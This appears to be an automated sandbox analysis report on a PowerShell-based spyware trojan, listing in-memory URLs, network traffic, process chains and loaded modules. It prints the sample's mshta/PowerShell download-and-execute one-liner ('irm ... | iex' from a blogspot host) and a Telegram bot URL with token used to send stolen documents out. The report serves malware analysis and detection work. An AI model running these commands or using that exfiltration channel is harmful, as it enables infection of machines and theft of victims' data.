Source: qmgr.db.18.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.18.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.18.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.18.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.18.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.18.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.18.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: RegSvcs.exe, 00000005.00000002.3250437857.0000000002816000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: RegSvcs.exe, 00000005.00000002.3250437857.0000000002816000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 0000000F.00000002.2322477147.000002D2AB25C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2322477147.000002D2AACF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2322477147.000002D2AB27D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2D4B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DA36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DA55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://minecap4-22-24.blogspot.com
Source: powershell.exe, 00000017.00000002.2535220422.0000028E2D4B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://minecap4-22-24.blogspot.com/haha
Source: powershell.exe, 00000000.00000002.2595181727.00000244287F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2445039609.0000024417DD0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2445039609.0000024417DD0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000017.00000002.2535220422.0000028E2DACA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pubsubhubbub.appspot.com/
Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2445039609.0000024417DD0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2445039609.0000024417DD0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 0000000F.00000002.2322477147.000002D2AB2F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DAD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.google.com/blogger/2008
Source: powershell.exe, 0000000F.00000002.2322477147.000002D2AB2F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DAD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.google.com/g/2005
Source: powershell.exe, 00000017.00000002.2535220422.0000028E2DACA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.google.com/g/2005#thumbnail
Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.2445820760.0000024417F61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.3250437857.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2322477147.000002D2AA7F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2CFD3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2445039609.0000024417DD0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2445039609.0000024417DD0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2445039609.0000024417DD0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Amcache.hve.10.dr	String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000017.00000002.2535220422.0000028E2DACA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.blogger.com
Source: powershell.exe, 00000017.00000002.2535220422.0000028E2DAD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DACA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.blogger.com/styles/atom.css
Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2445039609.0000024417DD0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 0000000F.00000002.2322477147.000002D2AB2F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DAD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.georss.org/georss
Source: powershell.exe, 00000000.00000002.2445820760.0000024417F61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2322477147.000002D2AA83E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2322477147.000002D2AA82B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2CFFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2CFE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: RegSvcs.exe, 00000005.00000002.3250437857.00000000027B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: RegSvcs.exe, 00000005.00000002.3250437857.00000000027B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: RegSvcs.exe, 00000005.00000002.3250437857.00000000027B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: RegSvcs.exe, 00000005.00000002.3250437857.0000000002874000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.3250437857.0000000002A09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: RegSvcs.exe, 00000005.00000002.3250437857.00000000027B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/
Source: RegSvcs.exe, 00000005.00000002.3250437857.0000000002A09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/sendDocument
Source: RegSvcs.exe, 00000005.00000002.3250437857.0000000002874000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/sendDocumentLR
Source: powershell.exe, 00000000.00000002.2595181727.00000244287F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2595181727.00000244287F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2595181727.00000244287F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2445039609.0000024417DD0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2445039609.0000024417DD0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2445039609.0000024417DD0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0.
Source: edb.log.18.dr, qmgr.db.18.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000012.00000003.2335885953.00000235C65F0000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.dr, qmgr.db.18.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000F.00000002.2322477147.000002D2AACF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2D4B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000017.00000002.2535220422.0000028E2DACA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://img1.blogblog.com/img/b16-rounded.gif
Source: powershell.exe, 00000017.00000002.2535220422.0000028E2DAD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://minecap4-22-24.blogspot.
Source: powershell.exe, 0000000F.00000002.2322477147.000002D2AB268000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2322477147.000002D2AB27D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2322477147.000002D2AB2A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DA42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DA7E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://minecap4-22-24.blogspot.com
Source: powershell.exe, 00000017.00000002.2535220422.0000028E2DACA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://minecap4-22-24.blogspot.com/
Source: powershell.exe, 0000000F.00000002.2322477147.000002D2AB27D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DA7E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://minecap4-22-24.blogspot.com/atom.xml
Source: powershell.exe, 0000000F.00000002.2322477147.000002D2AB2F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DAD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://minecap4-22-24.blogspot.com/feeds/posts/default
Source: powershell.exe, 00000017.00000002.2535220422.0000028E2DA36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DA42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://minecap4-22-24.blogspot.com/haha
Source: powershell.exe, 00000000.00000002.2595181727.00000244287F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.18.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
Source: powershell.exe, 00000017.00000002.2535220422.0000028E2DACA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.blogger.com/feeds/3408437705493384378/posts/default?alt=atom

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.251.15.132:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.251.15.132:443 -> 192.168.2.5:49739 version: TLS 1.2

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_017112B8	4_2_017112B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_017112A7	4_2_017112A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01710E90	4_2_01710E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01710E80	4_2_01710E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A712B8	5_2_00A712B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A73363	5_2_00A73363
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A7E4D0	5_2_00A7E4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A7D8B8	5_2_00A7D8B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A7DC00	5_2_00A7DC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A712B4	5_2_00A712B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A70E8B	5_2_00A70E8B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A70E90	5_2_00A70E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06708248	5_2_06708248
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06771940	5_2_06771940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06771AB0	5_2_06771AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_067ADF00	5_2_067ADF00

Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe

Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 792

Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winPS1@29/26@4/5

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7884:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1080:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7204:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fhcrz10j.ok1.ps1

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\o3KyzpE7F4.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 792
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 788
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE "javascript:nd=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha \| iex);Start-Sleep -Seconds 5;','run']; la=[nd[3],nd[0],nd[1],nd[2]]; new ActiveXObject(la[2])[la[0]](la[3], 0, true);close();new ActiveXObject(la[1]).DeleteFile(WScript.ScriptFullName);"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha \| iex);Start-Sleep -Seconds 5;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" "javascript:ql=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha \| iex);Start-Sleep -Seconds 5;','run']; la=[ql[3
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE "javascript:nd=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha \| iex);Start-Sleep -Seconds 5;','run']; la=[nd[3],nd[0],nd[1],nd[2]]; new ActiveXObject(la[2])[la[0]](la[3], 0, true);close();new ActiveXObject(la[1]).DeleteFile(WScript.ScriptFullName);"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha \| iex);Start-Sleep -Seconds 5;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" "javascript:ql=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha \| iex);Start-Sleep -Seconds 5;','run']; la=[ql[3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 792	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 788	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha \| iex);Start-Sleep -Seconds 5;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha \| iex);Start-Sleep -Seconds 5;

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
